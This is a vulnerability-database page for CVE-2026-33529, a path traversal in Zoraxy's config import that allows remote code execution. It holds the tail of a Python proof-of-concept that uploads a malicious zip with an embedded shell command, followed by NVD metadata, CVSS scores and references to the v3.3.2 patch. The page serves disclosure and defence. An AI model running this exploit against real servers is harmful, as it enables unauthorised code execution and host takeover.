\u003e /tmp/pwned.txt\",\n                        help=\"Shell command to embed in the payload\")\n    args = parser.parse_args()\n\n    if not args.host or not args.password:\n        parser.error(\"--host and --pass are required\")\n    host = args.host.rstrip(\"/\")\n\n    print(f\"\\n[1] Authenticating as \u0027{args.user}\u0027 at {host} ...\")\n    session = requests.Session()\n    if not authenticate(host, args.user, args.password, session):\n        print(\"[-] Authentication failed.\")\n        sys.exit(1)\n    print(\"[+] Authenticated.\")\n\n    print(f\"\\n[2] Exporting live config ...\")\n    export_zip = export_config(host, session)\n    if not export_zip:\n        print(\"[-] Config export failed.\")\n        sys.exit(1)\n    print(\"\\n[3] Building malicious zip ...\")\n    zip_bytes = build_zip(args.cmd, export_zip)\n    print(f\"[+] Zip size: {len(zip_bytes):,} bytes\")\n\n    print(f\"\\n[4] Uploading via POST {host}/api/conf/import ...\")\n    code, body = upload_zip(host, session, zip_bytes)\n    print(f\"    HTTP {code}  {body[:200]!r}\")\n    if code != 200:\n        print(\"[-] Upload failed.\")\n        sys.exit(1)\n    print(\"[+] Files written\")\n\n\nif __name__ == \"__main__\":\n    main()\n```\n\n## Impact\n\nArbitrary file write leads to RCE by an authenticated user. Given that the Docker socket might be mapped, this issue can lead to full host takeover.",
  "id": "GHSA-7pq3-326h-f8q9",
  "modified": "2026-03-27T21:24:56Z",
  "published": "2026-03-25T20:04:44Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/tobychui/zoraxy/security/advisories/GHSA-7pq3-326h-f8q9"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33529"
    },
    {
      "type": "WEB",
      "url": "https://github.com/tobychui/zoraxy/commit/69ac755aeec5d15ba4c62099f7f1ed77a855b40b"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/tobychui/zoraxy"
    },
    {
      "type": "WEB",
      "url": "https://github.com/tobychui/zoraxy/releases/tag/v3.3.2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Zoraxy: Authenticated Path Traversal in Config Import leads to RCE"
}

FKIE_CVE-2026-33529

Vulnerability from fkie_nvd - Published: 2026-03-26 20:16 - Updated: 2026-04-02 18:13

Severity ?

3.3 (Low) - CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:N
8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/tobychui/zoraxy/commit/69ac755aeec5d15ba4c62099f7f1ed77a855b40b	Patch
security-advisories@github.com	https://github.com/tobychui/zoraxy/releases/tag/v3.3.2	Release Notes
security-advisories@github.com	https://github.com/tobychui/zoraxy/security/advisories/GHSA-7pq3-326h-f8q9	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	zoraxy	zoraxy	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:zoraxy:zoraxy:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "53E3D478-D37C-4CC6-96FF-381A55956C57",
              "versionEndExcluding": "3.3.2",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Zoraxy is a general purpose HTTP reverse proxy and forwarding tool. Prior to version 3.3.2, an authenticated path traversal vulnerability in the configuration import endpoint allows an authenticated user to write arbitrary files outside the config directory, which can lead to RCE by creating a plugin. Version 3.3.2 patches the issue."
    },
    {
      "lang": "es",
      "value": "Zoraxy es una herramienta de proxy inverso HTTP y reenv\u00edo de prop\u00f3sito general. Antes de la versi\u00f3n 3.3.2, una vulnerabilidad de salto de ruta autenticado en el endpoint de importaci\u00f3n de configuraci\u00f3n permite a un usuario autenticado escribir archivos arbitrarios fuera del directorio de configuraci\u00f3n, lo que puede llevar a RCE mediante la creaci\u00f3n de un plugin. La versi\u00f3n 3.3.2 corrige el problema."
    }
  ],
  "id": "CVE-2026-33529",
  "lastModified": "2026-04-02T18:13:03.553",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "HIGH",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 3.3,
          "baseSeverity": "LOW",
          "confidentialityImpact": "LOW",
          "integrityImpact": "LOW",
          "privilegesRequired": "HIGH",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 0.7,
        "impactScore": 2.5,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2026-03-26T20:16:15.070",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/tobychui/zoraxy/commit/69ac755aeec5d15ba4c62099f7f1ed77a855b40b"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Release Notes"
      ],
      "url": "https://github.com/tobychui/zoraxy/releases/tag/v3.3.2"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/tobychui/zoraxy/security/advisories/GHSA-7pq3-326h-f8q9"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-22"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-33529 (GCVE-0-2026-33529)

GHSA-7PQ3-326H-F8Q9

Authenticated Path Traversal to RCE via Configuration Import

Summary

Details

PoC

Impact

FKIE_CVE-2026-33529

Tags

Sightings

Nomenclature